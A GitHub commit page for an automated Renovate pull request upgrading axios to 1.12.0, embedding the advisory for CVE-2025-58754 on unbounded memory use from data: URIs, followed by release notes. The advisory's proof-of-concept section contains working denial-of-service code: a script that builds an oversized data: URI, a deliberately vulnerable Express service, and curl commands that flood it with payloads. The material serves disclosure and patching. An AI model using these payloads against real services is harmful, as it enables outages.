-
Notifications
You must be signed in to change notification settings - Fork 38
Commit 5f5133f
authored
chore(deps): update dependency axios to v1.12.0 [security] (#749)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [axios](https://axios-http.com)
([source](https://redirect.github.com/axios/axios)) | [`1.11.0` ->
`1.12.0`](https://renovatebot.com/diffs/npm/axios/1.11.0/1.12.0) |
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
### GitHub Vulnerability Alerts
####
[CVE-2025-58754](https://redirect.github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj)
## Summary
When Axios runs on Node.js and is given a URL with the `data:` scheme,
it does not perform HTTP. Instead, its Node http adapter decodes the
entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200
response.
This path ignores `maxContentLength` / `maxBodyLength` (which only
protect HTTP responses), so an attacker can supply a very large `data:`
URI and cause the process to allocate unbounded memory and crash (DoS),
even if the caller requested `responseType: 'stream'`.
## Details
The Node adapter (`lib/adapters/http.js`) supports the `data:` scheme.
When `axios` encounters a request whose URL starts with `data:`, it does
not perform an HTTP request. Instead, it calls `fromDataURI()` to decode
the Base64 payload into a Buffer or Blob.
Relevant code from
[`[httpAdapter](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):
```js
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];
if (protocol === 'data:') {
let convertedData;
if (method !== 'GET') {
return settle(resolve, reject, { status: 405, ... });
}
convertedData = fromDataURI(config.url, responseType === 'blob', {
Blob: config.env && config.env.Blob
});
return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
```
The decoder is in
[`[lib/helpers/fromDataURI.js](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):
```js
export default function fromDataURI(uri, asBlob, options) {
...
if (protocol === 'data') {
uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
const match = DATA_URL_PATTERN.exec(uri);
...
const body = match[3];
const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
if (asBlob) { return new _Blob([buffer], {type: mime}); }
return buffer;
}
throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
```
* The function decodes the entire Base64 payload into a Buffer with no
size limits or sanity checks.
* It does **not** honour `config.maxContentLength` or
`config.maxBodyLength`, which only apply to HTTP streams.
* As a result, a `data:` URI of arbitrary size can cause the Node
process to allocate the entire content into memory.
In comparison, normal HTTP responses are monitored for size, the HTTP
adapter accumulates the response into a buffer and will reject when
`totalResponseBytes` exceeds
[`[maxContentLength](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550).
No such check occurs for `data:` URIs.
## PoC
```js
const axios = require('axios');
async function main() {
// this example decodes ~120 MB
const base64Size = 160_000_000; // 120 MB after decoding
const base64 = 'A'.repeat(base64Size);
const uri = 'data:application/octet-stream;base64,' + base64;
console.log('Generating URI with base64 length:', base64.length);
const response = await axios.get(uri, {
responseType: 'arraybuffer'
});
console.log('Received bytes:', response.data.length);
}
main().catch(err => {
console.error('Error:', err.message);
});
```
Run with limited heap to force a crash:
```bash
node --max-old-space-size=100 poc.js
```
Since Node heap is capped at 100 MB, the process terminates with an
out-of-memory error:
```
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
```
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive
agents, timeouts, and a JSON body. It allows data: URLs which axios
fully ignore `maxContentLength `, `maxBodyLength` and decodes into
memory on Node before streaming enabling DoS.
```js
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";
const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
timeout: 10000,
maxRedirects: 5,
httpAgent, httpsAgent,
headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
validateStatus: c => c >= 200 && c < 400
});
const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";
app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));
app.get("/healthz", (req,res)=>res.send("ok"));
/**
* POST /preview { "url": "<http|https|data URL>" }
* Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
*/
app.post("/preview", async (req, res) => {
const url = req.body?.url;
if (!url) return res.status(400).json({ error: "missing url" });
let u;
try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }
// Developer allows using data:// in the allowlist
const allowed = new Set(["http:", "https:", "data:"]);
if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });
const controller = new AbortController();
const onClose = () => controller.abort();
res.on("close", onClose);
const before = process.memoryUsage().heapUsed;
try {
const r = await axiosClient.get(u.toString(), {
responseType: "stream",
maxContentLength: 8 * 1024, // Axios will ignore this for data:
maxBodyLength: 8 * 1024, // Axios will ignore this for data:
signal: controller.signal
});
// stream only the first 64KB back
const cap = 64 * 1024;
let sent = 0;
const limiter = new PassThrough();
r.data.on("data", (chunk) => {
if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
else { sent += chunk.length; limiter.write(chunk); }
});
r.data.on("end", () => limiter.end());
r.data.on("error", (e) => limiter.destroy(e));
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
limiter.pipe(res);
} catch (err) {
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
res.status(502).json({ error: String(err?.message || err) });
} finally {
res.off("close", onClose);
}
});
app.listen(PORT, () => {
console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
```
Run this app and send 3 post requests:
```sh
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @​payload.json -o /dev/null```
```
---
## Suggestions
1. **Enforce size limits**
For `protocol === 'data:'`, inspect the length of the Base64 payload
before decoding. If `config.maxContentLength` or `config.maxBodyLength`
is set, reject URIs whose payload exceeds the limit.
2. **Stream decoding**
Instead of decoding the entire payload in one `Buffer.from` call, decode
the Base64 string in chunks using a streaming Base64 decoder. This would
allow the application to process the data incrementally and abort if it
grows too large.
---
### Release Notes
<details>
<summary>axios/axios (axios)</summary>
###
[`v1.12.0`](https://redirect.github.com/axios/axios/blob/HEAD/CHANGELOG.md#1120-2025-09-11)
[Compare
Source](https://redirect.github.com/axios/axios/compare/v1.11.0...v1.12.0)
##### Bug Fixes
- adding build artifacts
([9ec86de](https://redirect.github.com/axios/axios/commit/9ec86de257bfa33856571036279169f385ed92bd))
- dont add dist on release
([a2edc36](https://redirect.github.com/axios/axios/commit/a2edc3606a4f775d868a67bb3461ff18ce7ecd11))
- **fetch-adapter:** set correct Content-Type for Node FormData
([#​6998](https://redirect.github.com/axios/axios/issues/6998))
([a9f47af](https://redirect.github.com/axios/axios/commit/a9f47afbf3224d2ca987dbd8188789c7ea853c5d))
- **node:** enforce maxContentLength for data: URLs
([#​7011](https://redirect.github.com/axios/axios/issues/7011))
([945435f](https://redirect.github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593))
- package exports
([#​5627](https://redirect.github.com/axios/axios/issues/5627))
([aa78ac2](https://redirect.github.com/axios/axios/commit/aa78ac23fc9036163308c0f6bd2bb885e7af3f36))
- **params:** removing '\[' and ']' from URL encode exclude characters
([#​3316](https://redirect.github.com/axios/axios/issues/3316))
([#​5715](https://redirect.github.com/axios/axios/issues/5715))
([6d84189](https://redirect.github.com/axios/axios/commit/6d84189349c43b1dcdd977b522610660cc4c7042))
- release pr run
([fd7f404](https://redirect.github.com/axios/axios/commit/fd7f404488b2c4f238c2fbe635b58026a634bfd2))
- **types:** change the type guard on isCancel
([#​5595](https://redirect.github.com/axios/axios/issues/5595))
([0dbb7fd](https://redirect.github.com/axios/axios/commit/0dbb7fd4f61dc568498cd13a681fa7f907d6ec7e))
##### Features
- **adapter:** surface low‑level network error details; attach original
error via cause
([#​6982](https://redirect.github.com/axios/axios/issues/6982))
([78b290c](https://redirect.github.com/axios/axios/commit/78b290c57c978ed2ab420b90d97350231c9e5d74))
- **fetch:** add fetch, Request, Response env config variables for the
adapter;
([#​7003](https://redirect.github.com/axios/axios/issues/7003))
([c959ff2](https://redirect.github.com/axios/axios/commit/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b))
- support reviver on JSON.parse
([#​5926](https://redirect.github.com/axios/axios/issues/5926))
([2a97634](https://redirect.github.com/axios/axios/commit/2a9763426e43d996fd60d01afe63fa6e1f5b4fca)),
closes
[#​5924](https://redirect.github.com/axios/axios/issues/5924)
- **types:** extend AxiosResponse interface to include custom headers
type
([#​6782](https://redirect.github.com/axios/axios/issues/6782))
([7960d34](https://redirect.github.com/axios/axios/commit/7960d34eded2de66ffd30b4687f8da0e46c4903e))
##### Contributors to this release
- <img
src="https://avatars.githubusercontent.com/u/22686401?v=4&s=18"
alt="avatar" width="18"/> [Willian
Agostini](https://redirect.github.com/WillianAgostini "+132/-16760
(#​7002 #​5926 #​6782 )")
- <img
src="https://avatars.githubusercontent.com/u/12586868?v=4&s=18"
alt="avatar" width="18"/> [Dmitriy
Mozgovoy](https://redirect.github.com/DigitalBrainJS "+4263/-293
(#​7006 #​7003 )")
- <img
src="https://avatars.githubusercontent.com/u/53833811?v=4&s=18"
alt="avatar" width="18"/> [khani](https://redirect.github.com/mkhani01
"+111/-15 (#​6982 )")
- <img
src="https://avatars.githubusercontent.com/u/7712804?v=4&s=18"
alt="avatar" width="18"/> [Ameer
Assadi](https://redirect.github.com/AmeerAssadi "+123/-0 (#​7011
)")
- <img
src="https://avatars.githubusercontent.com/u/70265727?v=4&s=18"
alt="avatar" width="18"/> [Emiedonmokumo
Dick-Boro](https://redirect.github.com/emiedonmokumo "+55/-35
(#​6998 )")
- <img
src="https://avatars.githubusercontent.com/u/47859767?v=4&s=18"
alt="avatar" width="18"/> [Zeroday
BYTE](https://redirect.github.com/opsysdebug "+8/-8 (#​6980 )")
- <img
src="https://avatars.githubusercontent.com/u/4814473?v=4&s=18"
alt="avatar" width="18"/> [Jason
Saayman](https://redirect.github.com/jasonsaayman "+7/-7 (#​6985
#​6985 )")
- <img
src="https://avatars.githubusercontent.com/u/13010755?v=4&s=18"
alt="avatar" width="18"/> [최예찬](https://redirect.github.com/HealGaren
"+5/-7 (#​5715 )")
- <img
src="https://avatars.githubusercontent.com/u/7002604?v=4&s=18"
alt="avatar" width="18"/> [Gligor
Kotushevski](https://redirect.github.com/gligorkot "+3/-1 (#​5627
)")
- <img
src="https://avatars.githubusercontent.com/u/15893?v=4&s=18"
alt="avatar" width="18"/> [Aleksandar
Dimitrov](https://redirect.github.com/adimit "+2/-1 (#​5595 )")
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).
🚦 **Automerge**: Enabled.
♻ **Rebasing**: Whenever PR is behind base branch, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/apify/apify-client-js).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjk3LjEwIiwidGFyZ2V0QnJhbmNoIjoibWFzdGVyIiwibGFiZWxzIjpbXX0=-->
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>1 parent 9d0a16b commit 5f5133fCopy full SHA for 5f5133f
File tree
Expand file treeCollapse file tree
1 file changed
+3
-3
lines changedFilter options
Expand file treeCollapse file tree
1 file changed
+3
-3
lines changedCollapse file: package-lock.json
+3-3Lines changed: 3 additions & 3 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.
0 commit comments